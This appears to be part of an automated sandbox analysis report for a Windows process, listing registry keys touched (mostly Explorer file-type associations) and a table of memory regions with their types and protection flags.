HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
exefile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\OpenWithProgids
WMP11.AssocFile.FLAC
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fon\OpenWithProgids
fonfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithProgids
giffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ico\OpenWithProgids
icofile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.inf\OpenWithProgids
inffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ini\OpenWithProgids
inifile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jfif\OpenWithProgids
pjpegfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpe\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jxr\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
lnkfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2t\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2ts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\OpenWithProgids
WMP11.AssocFile.m3u
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\OpenWithProgids
WMP11.AssocFile.M4A
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mk3d\OpenWithProgids
WMP11.AssocFile.MK3D
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mka\OpenWithProgids
WMP11.AssocFile.MKA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mkv\OpenWithProgids
WMP11.AssocFile.MKV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mod\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\OpenWithProgids
WMP11.AssocFile.MOV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MP2\OpenWithProgids
WMP11.AssocFile.MP3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpa\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpv2\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msg\OpenWithProgids
Outlook.File.msg.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ocx\OpenWithProgids
ocxfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odp\OpenWithProgids
PowerPoint.OpenDocumentPresentation.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ods\OpenWithProgids
Excel.OpenDocumentSpreadsheet.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odt\OpenWithProgids
Word.OpenDocumentText.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.otf\OpenWithProgids
otffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
pngfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pot\OpenWithProgids
PowerPoint.Template.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potm\OpenWithProgids
PowerPoint.TemplateMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potx\OpenWithProgids
PowerPoint.Template.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppam\OpenWithProgids
PowerPoint.Addin.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsm\OpenWithProgids
PowerPoint.SlideShowMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsx\OpenWithProgids
PowerPoint.SlideShow.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppt\OpenWithProgids
PowerPoint.Show.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptm\OpenWithProgids
PowerPoint.ShowMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptx\OpenWithProgids
PowerPoint.Show.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1\OpenWithProgids
Microsoft.PowerShellScript.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1xml\OpenWithProgids
Microsoft.PowerShellXMLData.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psd1\OpenWithProgids
Microsoft.PowerShellData.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psm1\OpenWithProgids
Microsoft.PowerShellModule.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pssc\OpenWithProgids
Microsoft.PowerShellSessionConfiguration.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rle\OpenWithProgids
rlefile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rtf\OpenWithProgids
Word.RTF.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scf\OpenWithProgids
SHCmdFile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.search-ms\OpenWithProgids
SearchFolder
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithProgids
shtmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldm\OpenWithProgids
PowerPoint.SlideMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldx\OpenWithProgids
PowerPoint.Slide.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sys\OpenWithProgids
sysfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tif\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttc\OpenWithProgids
ttcfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttf\OpenWithProgids
ttffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
txtfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vsto\OpenWithProgids
bootstrap.vsto.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithProgids
WMP11.AssocFile.WAV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\OpenWithProgids
WMP11.AssocFile.WAX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wdp\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWithProgids
WMP11.AssocFile.WMA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmf\OpenWithProgids
wmffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids
WMP11.AssocFile.WMV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WPL\OpenWithProgids
WMP11.AssocFile.WPL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithProgids
WMP11.AssocFile.WVX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlam\OpenWithProgids
Excel.AddInMacroEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xls\OpenWithProgids
Excel.Sheet.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsb\OpenWithProgids
Excel.SheetBinaryMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsm\OpenWithProgids
Excel.SheetMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Excel.Sheet.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlt\OpenWithProgids
Excel.Template.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltm\OpenWithProgids
Excel.TemplateMacroEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltx\OpenWithProgids
Excel.Template
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithProgids
xmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xsl\OpenWithProgids
xslfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
CheckSetting
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
PastIconsStream
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
IconStreams
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
TaskbarStateLastRun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021492-0000-0000-C000-000000000046}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102
CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 251 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
ADAB000
heap
page read and write
4902000
heap
page read and write
284B06A3000
trusted library allocation
page read and write
BA67000
heap
page read and write
B959000
heap
page read and write
B8DE000
heap
page read and write
B66B000
heap
page read and write
A765000
heap
page read and write
B6C3000
heap
page read and write
BB2E000
heap
page read and write
BA66000
heap
page read and write
A704000
heap
page read and write
4909000
heap
page read and write
BB66000
heap
page read and write
A762000
heap
page read and write
B991000
heap
page read and write
896D000
heap
page read and write
284B0370000
trusted library allocation
page read and write
A77E000
heap
page read and write
87E0000
heap
page read and write
A771000
heap
page read and write
A6A2000
heap
page read and write
B931000
heap
page read and write
A787F7E000
unkown
page readonly
BB2D000
heap
page read and write
8EA6000
heap
page read and write
A749000
heap
page read and write
A765000
heap
page read and write
87F5000
heap
page read and write
8983000
heap
page read and write
C25A000
stack
page read and write
48E3000
heap
page read and write
8983000
heap
page read and write
A7CE000
heap
page read and write
880D000
heap
page read and write
A704000
heap
page read and write
A65F000
heap
page read and write
8902000
heap
page read and write
BBEC000
heap
page read and write
A704000
heap
page read and write
A77E000
heap
page read and write
B907000
heap
page read and write
ADBB000
heap
page read and write
A5D1000
heap
page read and write
BB0B000
heap
page read and write
87F9000
heap
page read and write
E0BB000
heap
page read and write
BAD5000
heap
page read and write
A77E000
heap
page read and write
B98B000
heap
page read and write
BB88000
heap
page read and write
882B000
heap
page read and write
A771000
heap
page read and write
AD93000
heap
page read and write
898F000
heap
page read and write
A687000
heap
page read and write
8978000
heap
page read and write
A77E000
heap
page read and write
4B50000
heap
page read and write
BB2E000
heap
page read and write
88D6000
heap
page read and write
284B0700000
remote allocation
page read and write
898F000
heap
page read and write
B6BD000
heap
page read and write
8978000
heap
page read and write
284B09C0000
trusted library allocation
page read and write
8913000
heap
page read and write
BADC000
heap
page read and write
BA64000
heap
page read and write
B695000
heap
page read and write
A765000
heap
page read and write
A76F000
heap
page read and write
31F2000
stack
page read and write
ADC8000
heap
page read and write
A749000
heap
page read and write
B689000
heap
page read and write
A7CE000
heap
page read and write
284B0615000
trusted library allocation
page read and write
87F9000
heap
page read and write
BB66000
heap
page read and write
BA2F000
heap
page read and write
7DF4F0F20000
trusted library allocation
page readonly
DD4F000
stack
page read and write
BA70000
heap
page read and write
BA30000
heap
page read and write
BAEA000
heap
page read and write
8973000
heap
page read and write
B991000
heap
page read and write
A63A000
heap
page read and write
8983000
heap
page read and write
8727000
heap
page read and write
48F2000
heap
page read and write
BB88000
heap
page read and write
A7CE000
heap
page read and write
B98B000
heap
page read and write
BBC0000
heap
page read and write
85A0000
heap
page read and write
A696000
heap
page read and write
87F9000
heap
page read and write
BB95000
heap
page read and write
A762000
heap
page read and write
BB88000
heap
page read and write
A7CE000
heap
page read and write
880D000
heap
page read and write
47BF000
heap
page read and write
87F3000
heap
page read and write
A771000
heap
page read and write
896F000
heap
page read and write
BB51000
heap
page read and write
B744000
heap
page read and write
BB51000
heap
page read and write
DE80000
heap
page read and write
4902000
heap
page read and write
284B0360000
trusted library allocation
page read and write
87FD000
heap
page read and write
A6A2000
heap
page read and write
4C53000
heap
page read and write
BB0D000
heap
page read and write
86A6000
heap
page read and write
BB0D000
heap
page read and write
A77E000
heap
page read and write
B907000
heap
page read and write
D19000
stack
page read and write
A749000
heap
page read and write
2C30000
heap
page read and write
A65F000
heap
page read and write
A762000
heap
page read and write
BB51000
heap
page read and write
B8D5000
heap
page read and write
8942000
heap
page read and write
ADE2000
heap
page read and write
7810000
trusted library allocation
page read and write
C020000
trusted library allocation
page read and write
4D08000
heap
page read and write
4902000
heap
page read and write
BA64000
heap
page read and write
B959000
heap
page read and write
A749000
heap
page read and write
8965000
heap
page read and write
B660000
heap
page read and write
87C0000
heap
page read and write
A623000
heap
page read and write
284AADB0000
heap
page read and write
BB0F000
heap
page read and write
896F000
heap
page read and write
A771000
heap
page read and write
BB75000
heap
page read and write
85C8000
heap
page read and write
C063000
trusted library allocation
page read and write
7DF4F0F51000
trusted library allocation
page execute read
4953000
heap
page read and write
A650000
heap
page read and write
85CB000
heap
page read and write
B991000
heap
page read and write
AD9E000
heap
page read and write
284AAE8E000
heap
page read and write
ADB0000
heap
page read and write
B3CE000
stack
page read and write
8978000
heap
page read and write
87C0000
heap
page read and write
A788000
heap
page read and write
88FE000
heap
page read and write
BB0F000
heap
page read and write
284B066C000
trusted library allocation
page read and write
11F0000
heap
page read and write
87C0000
heap
page read and write
B971000
heap
page read and write
A77E000
heap
page read and write
284B04EA000
heap
page read and write
B9DE000
heap
page read and write
4960000
heap
page read and write
284B03A4000
trusted library allocation
page read and write
85E2000
heap
page read and write
B923000
heap
page read and write
BB75000
heap
page read and write
87F7000
heap
page read and write
47D2000
heap
page read and write
493E000
heap
page read and write
B87F000
heap
page read and write
BB66000
heap
page read and write
B9DA000
heap
page read and write
A77E000
heap
page read and write
DF0F000
stack
page read and write
88F7000
heap
page read and write
A762000
heap
page read and write
BBCE000
heap
page read and write
898F000
heap
page read and write
BA55000
heap
page read and write
85E0000
heap
page read and write
8894000
heap
page read and write
A696000
heap
page read and write
A76F000
heap
page read and write
DEE000
stack
page read and write
BBB6000
heap
page read and write
BBCE000
heap
page read and write
7DF4F0F41000
trusted library allocation
page execute read
E1C0000
trusted library allocation
page read and write
8804000
heap
page read and write
A762000
heap
page read and write
8944000
heap
page read and write
87FB000
heap
page read and write
4C55000
heap
page read and write
BA70000
heap
page read and write
87F5000
heap
page read and write
A788B7E000
unkown
page readonly
BB0B000
heap
page read and write
4C4F000
heap
page read and write
48E6000
heap
page read and write
A762000
heap
page read and write
87E0000
heap
page read and write
887E000
heap
page read and write
BA1F000
heap
page read and write
87C0000
heap
page read and write
BB45000
heap
page read and write
87F3000
heap
page read and write
86A8000
heap
page read and write
4BA6000
heap
page read and write
DCCA000
stack
page read and write
8894000
heap
page read and write
86A8000
heap
page read and write
9168000
stack
page read and write
8894000
heap
page read and write
87FD000
heap
page read and write
87F7000
heap
page read and write
BBC0000
heap
page read and write
BB0D000
heap
page read and write
BB5B000
heap
page read and write
8804000
heap
page read and write
8891000
heap
page read and write
284B0390000
trusted library allocation
page read and write
BB53000
heap
page read and write
B931000
heap
page read and write
BBC0000
heap
page read and write
85C8000
heap
page read and write
284B0940000
trusted library allocation
page read and write
284B0670000
trusted library allocation
page read and write
B98E000
heap
page read and write
8999000
heap
page read and write
A704000
heap
page read and write
85D2000
heap
page read and write
87E8000
heap
page read and write
A68F000
heap
page read and write
87E8000
heap
page read and write
88F7000
heap
page read and write
A68F000
heap
page read and write
4948000
heap
page read and write
87E8000
heap
page read and write
A762000
heap
page read and write
B663000
heap
page read and write
A771000
heap
page read and write
A77E000
heap
page read and write
87F3000
heap
page read and write
A696000
heap
page read and write
284B064D000
trusted library allocation
page read and write
B9BE000
heap
page read and write
284B068E000
trusted library allocation
page read and write
B886000
heap
page read and write
8894000
heap
page read and write
A762000
heap
page read and write
BBEF000
heap
page read and write
A77C000
heap
page read and write
284B0371000
trusted library allocation
page read and write
ADDE000
heap
page read and write
882B000
heap
page read and write
8920000
heap
page read and write
FDCF000
stack
page read and write
284AB71A000
heap
page read and write
284B09B0000
trusted library allocation
page read and write
A762000
heap
page read and write
88D6000
heap
page read and write
8789000
heap
page read and write
A788000
heap
page read and write
A77C000
heap
page read and write
8789000
heap
page read and write
A788000
heap
page read and write
87F3000
heap
page read and write
284B06FC000
trusted library allocation
page read and write
BB66000
heap
page read and write
8942000
heap
page read and write
BAD7000
heap
page read and write
284AAE9F000
heap
page read and write
B6D4000
heap
page read and write
88FB000
heap
page read and write
A765000
heap
page read and write
A765000
heap
page read and write
87F7000
heap
page read and write
DDB0000
trusted library allocation
page read and write
4950000
heap
page read and write
C023000
trusted library allocation
page read and write
87FD000
heap
page read and write
BBCE000
heap
page read and write
A771000
heap
page read and write
87F5000
heap
page read and write
BA52000
heap
page read and write
4B8B000
heap
page read and write
E1C0000
trusted library allocation
page read and write
DD90000
trusted library allocation
page read and write
A762000
heap
page read and write
A76F000
heap
page read and write
BA1D000
heap
page read and write
E210000
heap
page read and write
BC02000
heap
page read and write
BB14000
heap
page read and write
FCC000
heap
page read and write
107E000
heap
page read and write
4C4D000
heap
page read and write
BBCF000
heap
page read and write
8772000
heap
page read and write
86AA000
heap
page read and write
4921000
heap
page read and write
F50000
heap
page read and write
A765000
heap
page read and write
A68B000
heap
page read and write
BA67000
heap
page read and write
B6B1000
heap
page read and write
B884000
heap
page read and write
BA23000
heap
page read and write
124B000
heap
page read and write
8942000
heap
page read and write
A762000
heap
page read and write
DD80000
trusted library allocation
page read and write
A5CE000
stack
page read and write
8944000
heap
page read and write
BB33000
heap
page read and write
B50000
heap
page read and write
B98B000
heap
page read and write
883D000
heap
page read and write
124F000
heap
page read and write
B25B000
stack
page read and write
BA37000
heap
page read and write
BAAC000
heap
page read and write
BB5B000
heap
page read and write
88FE000
heap
page read and write
284B03F0000
trusted library allocation
page read and write
8944000
heap
page read and write
B981000
heap
page read and write
4D10000
trusted library allocation
page read and write
88D6000
heap
page read and write
8920000
heap
page read and write
87F7000
heap
page read and write
BBCE000
heap
page read and write
87EE000
heap
page read and write
284AAEAE000
heap
page read and write
5520000
trusted library section
page read and write
8620000
heap
page read and write
4BD2000
heap
page read and write
B9FE000
heap
page read and write
B9FB000
heap
page read and write
A762000
heap
page read and write
A696000
heap
page read and write
A665000
heap
page read and write
8931000
heap
page read and write
D9BC000
stack
page read and write
284B03D0000
trusted library allocation
page read and write
295A000
stack
page read and write
4BF3000
heap
page read and write
BA4B000
heap
page read and write
85F8000
heap
page read and write
883C000
heap
page read and write
B9B9000
heap
page read and write
A6A2000
heap
page read and write
B31F000
stack
page read and write
87F7000
heap
page read and write
A749000
heap
page read and write
284AADA0000
heap
page read and write
B67B000
heap
page read and write
B9B2000
heap
page read and write
8966000
heap
page read and write
284B0462000
heap
page read and write
A765000
heap
page read and write
87F5000
heap
page read and write
87FB000
heap
page read and write
BB5B000
heap
page read and write
87F7000
heap
page read and write
BB51000
heap
page read and write
BB3E000
heap
page read and write
284AAE5C000
heap
page read and write
87F9000
heap
page read and write
87C0000
heap
page read and write
284B02E0000
trusted library allocation
page read and write
9B4F000
stack
page read and write
88D6000
heap
page read and write
BAFF000
heap
page read and write
86E7000
heap
page read and write
48E3000
heap
page read and write
BA42000
heap
page read and write
A765000
heap
page read and write
BE0000
heap
page read and write
284AAE7C000
heap
page read and write
87F7000
heap
page read and write
880D000
heap
page read and write
284B06A0000
trusted library allocation
page read and write
284B0608000
trusted library allocation
page read and write
8727000
heap
page read and write
87EE000
heap
page read and write
87F5000
heap
page read and write
87F5000
heap
page read and write
49A7000
heap
page read and write
C080000
trusted library allocation
page read and write
B80A000
heap
page read and write
87E8000
heap
page read and write
284AB75A000
heap
page read and write
A7CE000
heap
page read and write
284B0400000
heap
page read and write
A788279000
stack
page read and write
A765000
heap
page read and write
B8A2000
heap
page read and write
A690000
heap
page read and write
B9DA000
heap
page read and write
BB3E000
heap
page read and write
A6A6000
heap
page read and write
BBEC000
heap
page read and write
8978000
heap
page read and write
ADC8000
heap
page read and write
BDA000
stack
page read and write
284B06A0000
trusted library allocation
page read and write
8708000
heap
page read and write
284B041C000
heap
page read and write
A788000
heap
page read and write
A76F000
heap
page read and write
1380000
remote allocation
page read and write
BB53000
heap
page read and write
BA2F000
heap
page read and write
284AAEAE000
heap
page read and write
A68B000
heap
page read and write
87FB000
heap
page read and write
A704000
heap
page read and write
BB8C000
heap
page read and write
BA1B000
heap
page read and write
BBEF000
heap
page read and write
87EE000
heap
page read and write
A765000
heap
page read and write
A68B000
heap
page read and write
BA42000
heap
page read and write
A696000
heap
page read and write
87FB000
heap
page read and write
A68B000
heap
page read and write
A704000
heap
page read and write
7DF4F0F21000
trusted library allocation
page execute read
7DF4F0F50000
trusted library allocation
page readonly
C000000
trusted library allocation
page read and write
A1C0000
heap
page read and write
E212000
heap
page read and write
87FB000
heap
page read and write
4906000
heap
page read and write
B951000
heap
page read and write
894A000
heap
page read and write
87E8000
heap
page read and write
2A73000
heap
page read and write
A77E000
heap
page read and write
BC0E000
heap
page read and write
1243000
heap
page read and write
BB2E000
heap
page read and write
87EE000
heap
page read and write
A704000
heap
page read and write
A77C000
heap
page read and write
87E0000
heap
page read and write
284B03E0000
trusted library allocation
page read and write
DBBA000
stack
page read and write
A765000
heap
page read and write
A788000
heap
page read and write
B687000
heap
page read and write
A788000
heap
page read and write
B8CC000
heap
page read and write
896F000
heap
page read and write
BBEC000
heap
page read and write
8931000
heap
page read and write
284B06FF000
trusted library allocation
page read and write
A788000
heap
page read and write
8772000
heap
page read and write
B9FE000
heap
page read and write
A77C000
heap
page read and write
BBCE000
heap
page read and write
BA52000
heap
page read and write
A77C000
heap
page read and write
284ABC40000
trusted library allocation
page read and write
A77E000
heap
page read and write
4909000
heap
page read and write
880D000
heap
page read and write
85E0000
heap
page read and write
A5F8000
heap
page read and write
BA40000
heap
page read and write
887E000
heap
page read and write
B981000
heap
page read and write
880D000
heap
page read and write
284B071A000
trusted library allocation
page read and write
DDA3000
trusted library allocation
page read and write
B69B000
heap
page read and write
BBCE000
heap
page read and write
4B15000
heap
page read and write
B9A1000
heap
page read and write
BADE000
heap
page read and write
A7CE000
heap
page read and write
B991000
heap
page read and write
BBFB000
heap
page read and write
A704000
heap
page read and write
A669000
heap
page read and write
87C0000
heap
page read and write
BAE6000
heap
page read and write
A669000
heap
page read and write
BAFF000
heap
page read and write
A6A7000
heap
page read and write
85E4000
heap
page read and write
BEC9000
stack
page read and write
ADFB000
heap
page read and write
87EB000
heap
page read and write
4C32000
heap
page read and write
4948000
heap
page read and write
284B06E5000
trusted library allocation
page read and write
4BD1000
heap
page read and write
A6A4000
heap
page read and write
87FD000
heap
page read and write
284B06BA000
trusted library allocation
page read and write
862F000
heap
page read and write
ADF6000
heap
page read and write
A771000
heap
page read and write
